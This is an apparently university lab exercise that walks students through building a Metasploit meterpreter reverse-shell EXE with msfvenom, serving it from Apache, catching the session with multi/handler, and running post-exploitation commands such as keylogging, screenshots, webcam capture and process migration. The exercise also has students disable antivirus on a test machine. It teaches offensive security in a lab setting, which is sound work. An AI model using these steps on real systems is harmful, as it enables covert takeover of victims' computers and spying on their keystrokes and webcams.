4: Creating Infectious Media with Metasploit (15 pts.)

What You Need

Purpose

We will use Kali Linux and Metasploit to create a an infectious EXE file.

A user who runs that file surrenders control of their computer.

Finding the Attacker's IP Address

On your Linux machine, in a Terminal window, execute this command:
ifconfig
Find your IP address and make a note of it. In the example below, it is 172.16.1.203.

Using Msfvenom to Make a Malicious EXE

In Kali, execute this command to learn about msfvenom, which is part of Metasploit.
msfvenom -h
A help message appears, as shown below.

In Kali, execute these commands to create a malicious Windows executable file named "fun.exe" and serve it from a malicious Web server.

Adjust the IP address to match the IP address of your Kali machine (the C&C server).

msfvenom -p windows/meterpreter/reverse_tcp LHOST=172.16.1.203 -f exe > /var/www/html/fun.exe
service apache2 start
The operation proceeds without errors, as shown below.

Launching Msfconsole

In Kali, execute this command to start msfconsole, the main control system for Metasploit.
msfconsole
Metasploit launches, as shown below.

In Kali, at the msf> prompt, execute this command.

help
Several pages of help scroll by. The section we'll use is "Module commands", as shown below.

Starting a Command-and-Control (C&C) Server

Execute these commands to start a C&C listener.
use multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 0.0.0.0
exploit
Metasploit starts a "reverse TCP handler", as shown below.

Running the Malware on the Target Machine

On the target Windows machine, open a Web browser and open this URL, replacing the IP address with the IP address of your Kali machine:
http://172.16.1.203/fun.exe
The file "fun.exe" downloads. Bypass any warning boxes, double-click the file, and allow it to run.

Note: if you are using antivirus, you will need to disable it. You will also need to disable Windows Defender. If you have problems disabling your malware protection, use the Windows 2008 Server virtual machine, which has no malware protection.

On your Kali machine, a meterpeter session opens, as shown below.

Using The Meterpreter Shell

On your Kali machine, at meterpreter > prompt, execute this command:
help
Several pages of help scroll by. Several interesting commands as shown below.

Migrating to a Different Process

The Metasploit shell is running inside the "fun.exe" process. If the user closes that process, or logs off, the connection will be lost.

To become more persistent, we'll migrate to a process that will last longer.

To see a list of processes, at the meterpreter > prompt, execute this command:

ps
Let's migrate to the winlogon process.

At the meterpreter > prompt, execute this command:

migrate -N explorer.exe
Migration is unreliable. It may succeed, but it may time out. If it times out, take these steps, as shown below: The migration should succeed, as shown below.

If you can't get it to work after a few tries, skip it and proceed to the next section.

Post-Exploitation

You now own the target! Here are some fun meterpreter commands to try:

screenshotGives you an image of the target's desktop
keyscan_startBegins capturing keys typed in the target. On the Windows target, open Notepad and type in some text, such as your name.
keyscan_dumpShows the keystrokes captured so far
webcam_listShows the available webcams (if any)
webcam_snapTakes a photo with the webcam
shellGives you a Windows Command Prompt on the target
exitLeaves the Windows Command Prompt

Viewing Network Connections

On your Kali machine, at meterpreter > prompt, execute this command:
netstat
A list of network connections appears, including one to a remote port of 4444, as highlighted in the image below.

Notice the "PID/Program name" value for this connection, which is redacted in the image below.

4: Recording Your Success

Use the form below to record your score in Canvas.

If you don't have a Canvas account, see the instructions here.

Name or Email:
PID/Program name:

Updated 5-23-18 to run as a CTF
Minesweeper link removed 6-14-18
Integrated with Canvas 6-27-18